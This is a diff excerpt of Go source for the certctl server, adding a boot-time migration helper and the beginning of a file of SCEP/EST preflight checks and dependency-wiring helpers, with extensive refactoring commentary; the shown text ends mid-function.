||||||
|
// Sprint 8. Extracts the boot-time migration handling from main()'s
|
||||||
|
// inline body into two unexported helpers. Different shape from
|
||||||
|
// Sprints 1-7 (data-type relocation) and from Sprint 8a (existing
|
||||||
|
// helper-function relocation) — this sprint crosses the
|
||||||
|
// behavior-change boundary Sprint 8 first identified.
|
||||||
|
//
|
||||||
|
// What lives here
|
||||||
|
// ===============
|
||||||
|
// parseMigrateOnlyFlag() bool
|
||||||
|
// Hand-parses os.Args for `--migrate-only` (NOT flag.Parse — the
|
||||||
|
// server's config surface is otherwise env-var driven via
|
||||||
|
// config.Load; introducing flag.Parse's global state risks
|
||||||
|
// conflicting with other binaries that may import cmd/server later).
|
||||||
|
//
|
||||||
|
// runBootMigrations(cfg, db, logger, migrateOnly) (exitNow bool)
|
||||||
|
// Owns the Phase 4 DEPL-M1 migration-via-hook posture: the
|
||||||
|
// migrationsViaHook env-var read, the RunMigrations + RunSeed
|
||||||
|
// gate, the --migrate-only early-exit signal, and the
|
||||||
|
// CERTCTL_DEMO_SEED demo-overlay branch.
|
||||||
|
//
|
||||||
|
// Returns true ONLY when --migrate-only was set and migrations +
|
||||||
|
// seed completed cleanly. The caller (main) translates that to
|
||||||
|
// `return` rather than os.Exit(0) — which is the SOLE intentional
|
||||||
|
// behavior change in this sprint (see below).
|
||||||
|
//
|
||||||
|
// Behavior preservation contract
|
||||||
|
// ==============================
|
||||||
|
// Every error path inside runBootMigrations calls os.Exit(1)
|
||||||
|
// directly, matching the original inline behavior byte-for-byte
|
||||||
|
// (same log message, same exit code, same no-defer-run-on-fatal
|
||||||
|
// semantics). The error-path os.Exit(1) is intentional: when
|
||||||
|
// migration fails at boot, the server cannot recover, and bailing
|
||||||
|
// out without running defers is the original Go-idiomatic shape.
|
||||||
|
//
|
||||||
|
// The ONE behavior change: the --migrate-only SUCCESS path now
|
||||||
|
// returns to main() rather than calling os.Exit(0) inline. This
|
||||||
|
// has one observable effect: the `defer db.Close()` registered in
|
||||||
|
// main() now runs at clean exit instead of being skipped. That's
|
||||||
|
// strictly better hygiene (clean DB connection shutdown vs OS
|
||||||
|
// reclaim). The migration work is synchronous + complete before
|
||||||
|
// the return; nothing async is left running that db.Close() could
|
||||||
|
// truncate.
|
||||||
|
//
|
||||||
|
// All other paths — the migration log messages, the seed log
|
||||||
|
// messages, the migrationsViaHook env-var read order, the
|
||||||
|
// RunDemoSeed gating, the per-step success/skip log lines — are
|
||||||
|
// byte-identical to the pre-Sprint-8b inline form. Verified via
|
||||||
|
// `go test ./cmd/server/... -count=1 -short` (which runs the
|
||||||
|
// existing main_test.go assertions through the new call site).
|
||||||
|
//
|
||||||
|
// Why this is a separate commit
|
||||||
|
// =============================
|
||||||
|
// Sprint 8a (commit see git log) extracted the bottom-of-file
|
||||||
|
// helpers + adapter types — pure mechanical relocation that
|
||||||
|
// couldn't change runtime semantics. Sprint 8b crosses the boundary
|
||||||
|
// where mechanical relocation ends: introducing a new function
|
||||||
|
// call frame changes defer scope, panic recovery, and (in this
|
||||||
|
// case) the exit semantics for the --migrate-only path. The
|
||||||
|
// Phase 9 prompt's "refactor is mechanical relocation; behavior
|
||||||
|
// change is a separate concern" rule guards against exactly this
|
||||||
|
// shape of risk being landed without a focused review.
|
||||||
|
//
|
||||||
|
// Splitting Sprint 8a (mechanical) from Sprint 8b (behavior-aware)
|
||||||
|
// means the operator's git log shows:
|
||||||
|
// 3f1344e8 ... wire.go — no behavior change possible
|
||||||
|
// <this> ... migrations.go — one specific behavior shift,
|
||||||
|
// documented + intentional
|
||||||
|
//
|
||||||
|
// Anyone bisecting a future bug to one of these two commits gets a
|
||||||
|
// clean "is it mechanical or did the behavior change" signal.
|
||||||
|
|
||||||
|
// parseMigrateOnlyFlag scans os.Args for the `--migrate-only` token
|
||||||
|
// and returns true if found. Hand-parsed instead of using flag.Parse
|
||||||
|
// because:
|
||||||
|
//
|
||||||
|
// 1. The server's entire config surface is env-var driven via
|
||||||
|
// config.Load(). flag.Parse() introduces a global package-state
|
||||||
|
// dependency that future binaries importing cmd/server (test
|
||||||
|
// harnesses, CLI tools, embedded variants) would have to
|
||||||
|
// coordinate around.
|
||||||
|
// 2. The only flag we care about is the migration-vs-server-lifecycle
|
||||||
|
// toggle; a hand-parser is 6 lines and has no transitive cost.
|
||||||
|
// 3. The flag is Helm-pre-install-hook-facing (see
|
||||||
|
// deploy/helm/certctl/templates/migration-job.yaml). Its shape is
|
||||||
|
// pinned by that template, not by anything else; we don't need
|
||||||
|
// flag.Parse's auto-help generation or type coercion.
|
||||||
|
//
|
||||||
|
// Bare arg match — no `=` value form, no short alias, no override
|
||||||
|
// from env. Anyone passing `--migrate-only` ANYWHERE in os.Args[1:]
|
||||||
|
// flips the flag on. Matches the original inline behavior exactly.
|
||||||
|
func parseMigrateOnlyFlag() bool {
|
||||||
|
for _, arg := range os.Args[1:] {
|
||||||
|
if arg == "--migrate-only" {
|
||||||
|
return true
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return false
|
||||||
|
}
|
||||||
|
|
||||||
|
// runBootMigrations owns the Phase 4 DEPL-M1 boot-time migration
|
||||||
|
// posture. Three lifecycles to support:
|
||||||
|
//
|
||||||
|
// (a) Compose / VM / bare-metal: server runs migrations at boot.
|
||||||
|
// Default behavior — preserved unchanged.
|
||||||
|
// (b) Helm with pre-install/pre-upgrade hook: the migration Job
|
||||||
|
// runs `certctl-server --migrate-only`, does its work, and
|
||||||
|
// exits. The server Deployment's pods then start with
|
||||||
|
// CERTCTL_MIGRATIONS_VIA_HOOK=true set; they see the env
|
||||||
|
// var and skip their boot-time RunMigrations call so the
|
||||||
|
// Job's work isn't duplicated.
|
||||||
|
// (c) Bare `certctl-server --migrate-only` invocation (e.g.
|
||||||
|
// operator running a one-shot migration from the CLI):
|
||||||
|
// runs migrations + seed and returns true so main returns
|
||||||
|
// cleanly without starting the HTTP listener / scheduler /
|
||||||
|
// signing setup.
|
||||||
|
//
|
||||||
|
// migrateOnly captures case (c); CERTCTL_MIGRATIONS_VIA_HOOK
|
||||||
|
// captures case (b). Both paths converge on the same RunMigrations
|
||||||
|
// + RunSeed code below.
|
||||||
|
//
|
||||||
|
// Returns true ONLY when migrateOnly is set; caller (main) handles
|
||||||
|
// the clean exit via `return` so deferred cleanup (db.Close) runs.
|
||||||
|
// Returns false in every other case — caller continues normal boot.
|
||||||
|
// On any migration / seed error: os.Exit(1) inline (matches the
|
||||||
|
// pre-extraction shape; recovery is not possible at this boot
|
||||||
|
// stage).
|
||||||
|
func runBootMigrations(cfg *config.Config, db *sql.DB, logger *slog.Logger, migrateOnly bool) bool {
|
||||||
|
migrationsViaHook := strings.EqualFold(os.Getenv("CERTCTL_MIGRATIONS_VIA_HOOK"), "true")
|
||||||
|
|
||||||
|
if migrateOnly || !migrationsViaHook {
|
||||||
|
logger.Info("running migrations", "path", cfg.Database.MigrationsPath)
|
||||||
|
if err := postgres.RunMigrations(db, cfg.Database.MigrationsPath); err != nil {
|
||||||
|
logger.Error("failed to run migrations", "error", err)
|
||||||
|
os.Exit(1)
|
||||||
|
}
|
||||||
|
logger.Info("migrations completed")
|
||||||
|
} else {
|
||||||
|
logger.Info("skipping migrations at boot (CERTCTL_MIGRATIONS_VIA_HOOK=true — Helm pre-install/pre-upgrade hook owns this work)")
|
||||||
|
}
|
||||||
|
|
||||||
|
// Apply baseline seed data.
|
||||||
|
//
|
||||||
|
// U-3 (P1, cat-u-seed_initdb_schema_drift): pre-U-3 seed.sql was mounted
|
||||||
|
// into postgres `/docker-entrypoint-initdb.d/` alongside a hand-curated
|
||||||
|
// subset of migrations. Adding a migration that introduced a new column
|
||||||
|
// referenced by seed.sql (cat-o-retry_interval_unit_mismatch /
|
||||||
|
// policy_rules.severity / etc.) without also updating the compose volume
|
||||||
|
// mounts caused initdb to crash on first up. Post-U-3 the compose stack
|
||||||
|
// drops all initdb mounts; postgres comes up with empty schema, the
|
||||||
|
// server runs RunMigrations above, then this RunSeed call lands the
|
||||||
|
// baseline data — all from a single source of truth (this binary).
|
||||||
|
// See internal/repository/postgres/db.go::RunSeed for the contract.
|
||||||
|
//
|
||||||
|
// Phase 4 DEPL-M1: same migration-via-hook gating as RunMigrations.
|
||||||
|
// When the hook owns migrations it also owns the seed pass.
|
||||||
|
if migrateOnly || !migrationsViaHook {
|
||||||
|
logger.Info("applying baseline seed", "path", cfg.Database.MigrationsPath)
|
||||||
|
if err := postgres.RunSeed(db, cfg.Database.MigrationsPath); err != nil {
|
||||||
|
logger.Error("failed to apply seed data", "error", err)
|
||||||
|
os.Exit(1)
|
||||||
|
}
|
||||||
|
logger.Info("seed completed")
|
||||||
|
} else {
|
||||||
|
logger.Info("skipping baseline seed at boot (CERTCTL_MIGRATIONS_VIA_HOOK=true — hook applies seed alongside migrations)")
|
||||||
|
}
|
||||||
|
|
||||||
|
// Phase 4 DEPL-M1: --migrate-only early-exit. Migrations + seed are
|
||||||
|
// done; the operator only asked for the migration pass. Signal main
|
||||||
|
// to return cleanly so deferred db.Close runs (Sprint 8b improvement
|
||||||
|
// over the pre-extraction os.Exit(0) which skipped defers).
|
||||||
|
if migrateOnly {
|
||||||
|
logger.Info("--migrate-only: migrations + seed complete; exiting without starting server lifecycle")
|
||||||
|
return true
|
||||||
|
}
|
||||||
|
|
||||||
|
// Apply demo overlay seed when CERTCTL_DEMO_SEED=true. Pre-U-3 the demo
|
||||||
|
// overlay (deploy/docker-compose.demo.yml) mounted seed_demo.sql into
|
||||||
|
// postgres `/docker-entrypoint-initdb.d/`; that broke once U-3 dropped
|
||||||
|
// the initdb migration mounts (the demo seed references tables that
|
||||||
|
// wouldn't exist at initdb time). The runtime path here is the
|
||||||
|
// post-U-3 replacement. Default-off so a vanilla deploy never lands
|
||||||
|
// fake-history rows. See postgres.RunDemoSeed for the contract.
|
||||||
|
if cfg.Database.DemoSeed {
|
||||||
|
logger.Info("applying demo seed (CERTCTL_DEMO_SEED=true)", "path", cfg.Database.MigrationsPath)
|
||||||
|
if err := postgres.RunDemoSeed(db, cfg.Database.MigrationsPath); err != nil {
|
||||||
|
logger.Error("failed to apply demo seed data", "error", err)
|
||||||
|
os.Exit(1)
|
||||||
|
}
|
||||||
|
logger.Info("demo seed completed")
|
||||||
|
}
|
||||||
|
|
||||||
|
return false
|
||||||
|
}
|
||||||
@@ -0,0 +1,758 @@
|
|||||||
|
// Copyright 2026 certctl LLC. All rights reserved.
|
||||||
|
// SPDX-License-Identifier: BUSL-1.1
|
||||||
|
|
||||||
|
package main
|
||||||
|
|
||||||
|
import (
|
||||||
|
"context"
|
||||||
|
"crypto"
|
||||||
|
"crypto/tls"
|
||||||
|
"crypto/x509"
|
||||||
|
"encoding/pem"
|
||||||
|
"fmt"
|
||||||
|
"log/slog"
|
||||||
|
"net/http"
|
||||||
|
"os"
|
||||||
|
"strings"
|
||||||
|
"time"
|
||||||
|
|
||||||
|
"github.com/certctl-io/certctl/internal/api/handler"
|
||||||
|
oidcdomain "github.com/certctl-io/certctl/internal/auth/oidc/domain"
|
||||||
|
"github.com/certctl-io/certctl/internal/auth/session"
|
||||||
|
userdomain "github.com/certctl-io/certctl/internal/auth/user/domain"
|
||||||
|
"github.com/certctl-io/certctl/internal/domain"
|
||||||
|
authdomainAlias "github.com/certctl-io/certctl/internal/domain/auth"
|
||||||
|
"github.com/certctl-io/certctl/internal/repository"
|
||||||
|
"github.com/certctl-io/certctl/internal/repository/postgres"
|
||||||
|
"github.com/certctl-io/certctl/internal/scep/intune"
|
||||||
|
"github.com/certctl-io/certctl/internal/service"
|
||||||
|
authsvc "github.com/certctl-io/certctl/internal/service/auth"
|
||||||
|
"github.com/certctl-io/certctl/internal/trustanchor"
|
||||||
|
)
|
||||||
|
|
||||||
|
// Phase 9 ARCH-M2 closure Sprint 8 (2026-05-14): extracted from
|
||||||
|
// cmd/server/main.go. Different shape from the config.go cuts —
|
||||||
|
// the move is by FUNCTIONAL CONCERN (boot-time preflight + DI
|
||||||
|
// adapter wiring), not by TYPE FAMILY.
|
||||||
|
//
|
||||||
|
// Sprint 8 ships TWO of the three files the Phase 9 prompt names:
|
||||||
|
// - main.go — entrypoint (unchanged; what's left after the cut)
|
||||||
|
// - wire.go — this file (DI assembly: preflight helpers +
|
||||||
|
// adapter types that bridge package boundaries)
|
||||||
|
//
|
||||||
|
// The third file the prompt names — migrations.go — is NOT in this
|
||||||
|
// commit. See "What's NOT in this sprint" below for the deferral
|
||||||
|
// rationale.
|
||||||
|
//
|
||||||
|
// What lives here
|
||||||
|
// ===============
|
||||||
|
// Seven preflight + DI helper functions:
|
||||||
|
// - preflightSCEPChallengePassword (H-2 fix: SCEP needs non-empty
|
||||||
|
// shared secret if enabled)
|
||||||
|
// - preflightSCEPMTLSTrustBundle (SCEP Phase 6.5: per-profile
|
||||||
|
// mTLS CA bundle validation)
|
||||||
|
// - preflightESTMTLSClientCATrustBundle (EST Phase 2.5: same shape,
|
||||||
|
// returns SIGHUP-reloadable
|
||||||
|
// *trustanchor.Holder)
|
||||||
|
// - preflightSCEPIntuneTrustAnchor (SCEP Phase 8.2: Intune
|
||||||
|
// Connector signing-cert bundle)
|
||||||
|
// - loadSCEPRAPair (post-preflight cert+key load)
|
||||||
|
// - preflightSCEPRACertKey (RA cert/key validation: file
|
||||||
|
// mode 0600, cert+key match,
|
||||||
|
// NotAfter, RSA-or-ECDSA alg)
|
||||||
|
// - preflightEnrollmentIssuer (L-005: EST/SCEP issuer can
|
||||||
|
// serve GetCACertPEM)
|
||||||
|
// - buildFinalHandler (M-001 option D: HTTP dispatch
|
||||||
|
// wrapper routing
|
||||||
|
// authenticated vs no-auth
|
||||||
|
// chains by URL prefix)
|
||||||
|
//
|
||||||
|
// Five adapter types that bridge package boundaries (avoid import
|
||||||
|
// cycles between internal/auth, internal/service/auth,
|
||||||
|
// internal/api/handler, internal/auth/oidc, internal/auth/session,
|
||||||
|
// internal/auth/breakglass):
|
||||||
|
// - authPermissionCheckerAdapter (typed-string → plain-string
|
||||||
|
// auth.PermissionChecker
|
||||||
|
// interface)
|
||||||
|
// - authCheckResolverAdapter (postgres ActorRoleRepository
|
||||||
|
// → handler.AuthCheckResolver)
|
||||||
|
// - sessionMinterAdapter (session.Service → OIDC
|
||||||
|
// SessionMinter port)
|
||||||
|
// - breakglassSessionMinterAdapter (session.Service → breakglass
|
||||||
|
// SessionMinter port + audit
|
||||||
|
// 2026-05-10 HIGH-1 revoke-all)
|
||||||
|
// - oidcProvidersListAdapter (postgres OIDCProviderRepository
|
||||||
|
// → handler.OIDCProvidersListResolver
|
||||||
|
// with MED-9 enabled-filter)
|
||||||
|
//
|
||||||
|
// Plus the silenceUnusedImports var-block that pins
|
||||||
|
// oidcdomain.OIDCProvider as a load-bearing reference (the adapter
|
||||||
|
// types use *userdomain.User and repository.OIDCProviderRepository
|
||||||
|
// indirectly; oidcdomain.OIDCProvider isn't named in any function
|
||||||
|
// signature here but is part of the Phase 3 SessionMinter contract).
|
||||||
|
//
|
||||||
|
// What's NOT in this sprint (and why)
|
||||||
|
// ===================================
|
||||||
|
// migrations.go is deferred. The Phase 9 prompt asks for three files:
|
||||||
|
// main.go (entrypoint) + wire.go (this file) + migrations.go (boot-
|
||||||
|
// time migration handling). The migration code (Phase 4 DEPL-M1
|
||||||
|
// --migrate-only flag handling + RunMigrations + RunSeed call +
|
||||||
|
// CERTCTL_MIGRATIONS_VIA_HOOK gating) lives INLINE inside the 2300-
|
||||||
|
// line main() function — lines ~59-264 in the original — not as a
|
||||||
|
// standalone helper.
|
||||||
|
//
|
||||||
|
// Extracting it into a migrations.go would require:
|
||||||
|
// 1. Creating a new unexported function (e.g.,
|
||||||
|
// runMigrations(ctx, cfg, db, logger) error) that consolidates
|
||||||
|
// lines ~71-77 (--migrate-only parse) + ~199-248 (the migration
|
||||||
|
// branch + --migrate-only early-exit) + ~250-264 (the demo
|
||||||
|
// overlay seed branch).
|
||||||
|
// 2. Replacing the inline block in main() with a single call.
|
||||||
|
// 3. Threading the early-exit semantics out (os.Exit(0) vs return
|
||||||
|
// "migration done" sentinel error vs a third option) so main's
|
||||||
|
// defer ordering doesn't change.
|
||||||
|
//
|
||||||
|
// That's behavior-change territory — a new function call frame, a
|
||||||
|
// new defer scope, error-handling pattern shift. Different risk
|
||||||
|
// shape from the pure-data type relocations Sprints 1-7 did. The
|
||||||
|
// Phase 9 prompt says "Do NOT change exported type signatures; the
|
||||||
|
// refactor is mechanical relocation; behavior change is a separate
|
||||||
|
// concern." Extracting an inline block from main() into a new
|
||||||
|
// function is the same shape of risk that rule was guarding against.
|
||||||
|
//
|
||||||
|
// Recommended path for the migrations.go cut:
|
||||||
|
// - Land it as a separate, smaller PR with its own review focus
|
||||||
|
// (the runMigrations function shape, the early-exit semantics,
|
||||||
|
// unit tests for the new function via the existing main_test.go
|
||||||
|
// fixture). The infrastructure for the PR exists today; only
|
||||||
|
// the operator's go-ahead on the behavior-change risk is needed.
|
||||||
|
// - Estimated impact: another ~80-120 LOC out of main.go (the
|
||||||
|
// migration + seed + early-exit block) into a new migrations.go.
|
||||||
|
// - Phase 4's --migrate-only code path already runs through this
|
||||||
|
// code section, so the extracted function should reproduce that
|
||||||
|
// exact flow without behavior change beyond the call-frame
|
||||||
|
// introduction.
|
||||||
|
//
|
||||||
|
// Public-surface invariant
|
||||||
|
// ========================
|
||||||
|
// The moved helpers + adapter types are all in package `main`
|
||||||
|
// (which Go cannot expose to external importers). No exported
|
||||||
|
// surface changes. The reorganization is invisible outside
|
||||||
|
// cmd/server/. Same-package callers in main.go (preflight*
|
||||||
|
// invocations, adapter instantiation) resolve via the package
|
||||||
|
// symbol table without modification.
|
||||||
|
|
||||||
|
// preflightSCEPChallengePassword enforces the H-2 fix: if SCEP is enabled, a
|
||||||
|
// non-empty challenge password MUST be configured. Returns a non-nil error
|
||||||
|
// otherwise so the caller can refuse to start the control plane (CWE-306,
|
||||||
|
// missing authentication for a critical function).
|
||||||
|
//
|
||||||
|
// This helper is extracted so the check can be unit tested without booting
|
||||||
|
// the full server. The caller (main) is responsible for translating the
|
||||||
|
// returned error into a structured log line and os.Exit(1).
|
||||||
|
func preflightSCEPChallengePassword(enabled bool, challengePassword string) error {
|
||||||
|
if !enabled {
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
if challengePassword == "" {
|
||||||
|
return fmt.Errorf("SCEP enabled but CERTCTL_SCEP_CHALLENGE_PASSWORD is empty: " +
|
||||||
|
"SCEP enrollment would accept any client (CWE-306); " +
|
||||||
|
"configure a non-empty shared secret or set CERTCTL_SCEP_ENABLED=false")
|
||||||
|
}
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
|
||||||
|
// preflightSCEPMTLSTrustBundle validates a per-profile mTLS client-CA
|
||||||
|
// trust bundle. SCEP RFC 8894 + Intune master bundle Phase 6.5.
|
||||||
|
//
|
||||||
|
// Mirrors preflightSCEPRACertKey's no-op-when-disabled pattern; otherwise
|
||||||
|
// the checks are:
|
||||||
|
//
|
||||||
|
// 1. Path is non-empty (the Validate() refuse covers this too, but
|
||||||
|
// preflight reports the specific failure with an actionable error
|
||||||
|
// string + os.Exit(1) at the call site).
|
||||||
|
// 2. File exists + readable.
|
||||||
|
// 3. PEM-decodes to ≥1 CERTIFICATE block.
|
||||||
|
// 4. None of the bundled certs is past NotAfter — an expired trust
|
||||||
|
// anchor would silently reject every client cert at runtime.
|
||||||
|
//
|
||||||
|
// On success, returns the parsed *x509.CertPool ready to inject into the
|
||||||
|
// per-profile SCEPHandler via SetMTLSTrustPool. Each bundled cert also
|
||||||
|
// contributes to the union pool that backs the TLS-layer
|
||||||
|
// VerifyClientCertIfGiven.
|
||||||
|
func preflightSCEPMTLSTrustBundle(enabled bool, bundlePath string) (*x509.CertPool, error) {
|
||||||
|
if !enabled {
|
||||||
|
return nil, nil
|
||||||
|
}
|
||||||
|
if bundlePath == "" {
|
||||||
|
return nil, fmt.Errorf("MTLS enabled but trust bundle path empty: " +
|
||||||
|
"set CERTCTL_SCEP_PROFILE_<NAME>_MTLS_CLIENT_CA_TRUST_BUNDLE_PATH to a PEM file " +
|
||||||
|
"containing the bootstrap-CA certs the operator allows to enroll")
|
||||||
|
}
|
||||||
|
body, err := os.ReadFile(bundlePath)
|
||||||
|
if err != nil {
|
||||||
|
return nil, fmt.Errorf("read MTLS trust bundle: %w (path=%s)", err, bundlePath)
|
||||||
|
}
|
||||||
|
pool := x509.NewCertPool()
|
||||||
|
rest := body
|
||||||
|
count := 0
|
||||||
|
now := time.Now()
|
||||||
|
for {
|
||||||
|
var block *pem.Block
|
||||||
|
block, rest = pem.Decode(rest)
|
||||||
|
if block == nil {
|
||||||
|
break
|
||||||
|
}
|
||||||
|
if block.Type != "CERTIFICATE" {
|
||||||
|
continue
|
||||||
|
}
|
||||||
|
cert, err := x509.ParseCertificate(block.Bytes)
|
||||||
|
if err != nil {
|
||||||
|
return nil, fmt.Errorf("parse MTLS trust bundle cert: %w (path=%s)", err, bundlePath)
|
||||||
|
}
|
||||||
|
if now.After(cert.NotAfter) {
|
||||||
|
return nil, fmt.Errorf("MTLS trust bundle cert expired at %s (subject=%q, path=%s) — replace before restart",
|
||||||
|
cert.NotAfter.Format(time.RFC3339), cert.Subject.CommonName, bundlePath)
|
||||||
|
}
|
||||||
|
pool.AddCert(cert)
|
||||||
|
count++
|
||||||
|
}
|
||||||
|
if count == 0 {
|
||||||
|
return nil, fmt.Errorf("MTLS trust bundle contained no CERTIFICATE PEM blocks (path=%s)", bundlePath)
|
||||||
|
}
|
||||||
|
return pool, nil
|
||||||
|
}
|
||||||
|
|
||||||
|
// preflightESTMTLSClientCATrustBundle validates a per-profile EST mTLS
|
||||||
|
// client-CA trust bundle and returns a SIGHUP-reloadable holder.
|
||||||
|
//
|
||||||
|
// EST RFC 7030 hardening master bundle Phase 2.5.
|
||||||
|
//
|
||||||
|
// Mirrors preflightSCEPMTLSTrustBundle's checks (file exists, parses as
|
||||||
|
// PEM, ≥1 cert, none expired) but returns a *trustanchor.Holder rather
|
||||||
|
// than a raw *x509.CertPool — the EST handler stores the holder so a
|
||||||
|
// SIGHUP rotates the trust bundle live without a server restart, exactly
|
||||||
|
// the way the Intune trust anchor rotation works (Phase 8.5 of the SCEP
|
||||||
|
// bundle). The handler-side .Pool() accessor on the holder rebuilds an
|
||||||
|
// x509.CertPool from the current snapshot for each Verify call.
|
||||||
|
//
|
||||||
|
// Uses the shared internal/trustanchor.LoadBundle (extracted in EST
|
||||||
|
// hardening Phase 2.1 from the original Intune-only path) so the EST
|
||||||
|
// + Intune callers exercise the same loader semantics — empty bundle
|
||||||
|
// rejected, expired cert rejected with subject in error message,
|
||||||
|
// non-CERTIFICATE PEM blocks tolerated.
|
||||||
|
func preflightESTMTLSClientCATrustBundle(enabled bool, pathID, bundlePath string, logger *slog.Logger) (*trustanchor.Holder, error) {
|
||||||
|
if !enabled {
|
||||||
|
return nil, nil
|
||||||
|
}
|
||||||
|
if bundlePath == "" {
|
||||||
|
return nil, fmt.Errorf("EST profile (PathID=%q) MTLS enabled but trust bundle path empty: "+
|
||||||
|
"set CERTCTL_EST_PROFILE_<NAME>_MTLS_CLIENT_CA_TRUST_BUNDLE_PATH to a PEM file "+
|
||||||
|
"containing the bootstrap-CA certs the operator allows to enroll", pathID)
|
||||||
|
}
|
||||||
|
holder, err := trustanchor.New(bundlePath, logger)
|
||||||
|
if err != nil {
|
||||||
|
return nil, fmt.Errorf("EST profile (PathID=%q) MTLS trust bundle preflight: %w", pathID, err)
|
||||||
|
}
|
||||||
|
holder.SetLabelForLog(fmt.Sprintf("EST mTLS client CA bundle (PathID=%q)", pathID))
|
||||||
|
return holder, nil
|
||||||
|
}
|
||||||
|
|
||||||
|
// preflightSCEPIntuneTrustAnchor validates a per-profile Microsoft Intune
|
||||||
|
// Certificate Connector signing-cert trust bundle.
|
||||||
|
//
|
||||||
|
// SCEP RFC 8894 + Intune master bundle Phase 8.2.
|
||||||
|
//
|
||||||
|
// No-op when this profile has Intune disabled (the common case for
|
||||||
|
// non-Intune SCEP deploys). When enabled:
|
||||||
|
//
|
||||||
|
// 1. Path is non-empty (Validate() refuse covers this too; we re-check
|
||||||
|
// here so the caller can os.Exit(1) with the specific PathID in the
|
||||||
|
// log line).
|
||||||
|
// 2. File exists + readable.
|
||||||
|
// 3. PEM-decodes to ≥1 CERTIFICATE block (intune.LoadTrustAnchor enforces
|
||||||
|
// this and skips non-CERTIFICATE blocks like accidentally-pasted
|
||||||
|
// priv-key blocks).
|
||||||
|
// 4. None of the bundled certs is past NotAfter — an expired Intune
|
||||||
|
// trust anchor would silently reject every Connector challenge at
|
||||||
|
// runtime, which is a much worse failure mode than failing fast at
|
||||||
|
// boot. intune.LoadTrustAnchor enforces this and surfaces the subject
|
||||||
|
// CN in the error message so the operator knows which cert to rotate.
|
||||||
|
//
|
||||||
|
// On success returns the freshly-built *intune.TrustAnchorHolder ready to
|
||||||
|
// inject into the per-profile SCEPService via SetIntuneIntegration. The
|
||||||
|
// holder also installs the SIGHUP watcher (started by the caller).
|
||||||
|
func preflightSCEPIntuneTrustAnchor(enabled bool, pathID, path string, logger *slog.Logger) (*intune.TrustAnchorHolder, error) {
|
||||||
|
if !enabled {
|
||||||
|
return nil, nil
|
||||||
|
}
|
||||||
|
// pathIDLabel renders the empty-string PathID as "<root>" so the
|
||||||
|
// operator's boot-log error doesn't read like a missing variable.
|
||||||
|
pathIDLabel := pathID
|
||||||
|
if pathIDLabel == "" {
|
||||||
|
pathIDLabel = "<root>"
|
||||||
|
}
|
||||||
|
if path == "" {
|
||||||
|
return nil, fmt.Errorf("SCEP profile (PathID=%q) INTUNE enabled but trust anchor path empty: "+
|
||||||
|
"set CERTCTL_SCEP_PROFILE_<NAME>_INTUNE_CONNECTOR_CERT_PATH to a PEM bundle "+
|
||||||
|
"of the Microsoft Intune Certificate Connector's signing certs", pathIDLabel)
|
||||||
|
}
|
||||||
|
holder, err := intune.NewTrustAnchorHolder(path, logger)
|
||||||
|
if err != nil {
|
||||||
|
return nil, fmt.Errorf("SCEP profile (PathID=%q) INTUNE trust anchor load failed: %w (path=%s)", pathIDLabel, err, path)
|
||||||
|
}
|
||||||
|
return holder, nil
|
||||||
|
}
|
||||||
|
|
||||||
|
// loadSCEPRAPair reads the RA cert PEM + key PEM and returns the parsed
|
||||||
|
// x509.Certificate + crypto.PrivateKey ready for the SCEP handler's RFC
|
||||||
|
// 8894 path. Called AFTER preflightSCEPRACertKey passed; failures here
|
||||||
|
// indicate a TOCTOU race or a filesystem change between preflight and
|
||||||
|
// the load (rare).
|
||||||
|
//
|
||||||
|
// Cert PEM may carry a chain (CA + RA + intermediate); we use the FIRST
|
||||||
|
// CERTIFICATE block, matching the RFC 8894 §3.5.1 single-cert convention
|
||||||
|
// for the GetCACert response.
|
||||||
|
func loadSCEPRAPair(certPath, keyPath string) (*x509.Certificate, crypto.PrivateKey, error) {
|
||||||
|
certPEM, err := os.ReadFile(certPath)
|
||||||
|
if err != nil {
|
||||||
|
return nil, nil, fmt.Errorf("read RA cert: %w", err)
|
||||||
|
}
|
||||||
|
keyPEM, err := os.ReadFile(keyPath)
|
||||||
|
if err != nil {
|
||||||
|
return nil, nil, fmt.Errorf("read RA key: %w", err)
|
||||||
|
}
|
||||||
|
pair, err := tls.X509KeyPair(certPEM, keyPEM)
|
||||||
|
if err != nil {
|
||||||
|
return nil, nil, fmt.Errorf("parse RA pair: %w", err)
|
||||||
|
}
|
||||||
|
if len(pair.Certificate) == 0 {
|
||||||
|
return nil, nil, fmt.Errorf("RA cert PEM contained no certificate blocks")
|
||||||
|
}
|
||||||
|
leaf, err := x509.ParseCertificate(pair.Certificate[0])
|
||||||
|
if err != nil {
|
||||||
|
return nil, nil, fmt.Errorf("parse RA cert: %w", err)
|
||||||
|
}
|
||||||
|
return leaf, pair.PrivateKey, nil
|
||||||
|
}
|
||||||
|
|
||||||
|
// preflightSCEPRACertKey validates the RA cert/key pair the RFC 8894 SCEP
|
||||||
|
// path requires. Mirrors preflightSCEPChallengePassword's no-op-when-disabled
|
||||||
|
// pattern; otherwise the checks are:
|
||||||
|
//
|
||||||
|
// 1. Both paths are non-empty (the Validate() refuse covers this too,
|
||||||
|
// but preflight reports the specific failure mode + os.Exit(1) so the
|
||||||
|
// operator sees a clear log line in addition to the config error).
|
||||||
|
// 2. The key file mode is 0600 (refuse world-/group-readable RA key —
|
||||||
|
// defense-in-depth against credential leak via a misconfigured
|
||||||
|
// deploy that leaves /etc/certctl/scep/*.key as 0644).
|
||||||
|
// 3. Cert PEM parses to exactly one x509.Certificate.
|
||||||
|
// 4. Key PEM parses to a Go crypto.Signer (RSA or ECDSA — RFC 8894
|
||||||
|
// §3.5.2 advertises those as the CMS-compatible algorithms).
|
||||||
|
// 5. The cert's PublicKey matches the key's Public() — refuses pairs
|
||||||
|
// accidentally swapped between profiles in a multi-profile config.
|
||||||
|
// 6. The cert's NotAfter is in the future — an expired RA cert would
|
||||||
|
// fail TLS handshake on EnvelopedData decryption per RFC 5652.
|
||||||
|
//
|
||||||
|
// Each check returns a wrapped error; the caller (main) is responsible for
|
||||||
|
// translating to a structured slog.Error + os.Exit(1) so the helper stays
|
||||||
|
// unit-testable without booting the full server.
|
||||||
|
func preflightSCEPRACertKey(enabled bool, raCertPath, raKeyPath string) error {
|
||||||
|
if !enabled {
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
if raCertPath == "" || raKeyPath == "" {
|
||||||
|
return fmt.Errorf("SCEP enabled but RA pair missing: " +
|
||||||
|
"set CERTCTL_SCEP_RA_CERT_PATH + CERTCTL_SCEP_RA_KEY_PATH " +
|
||||||
|
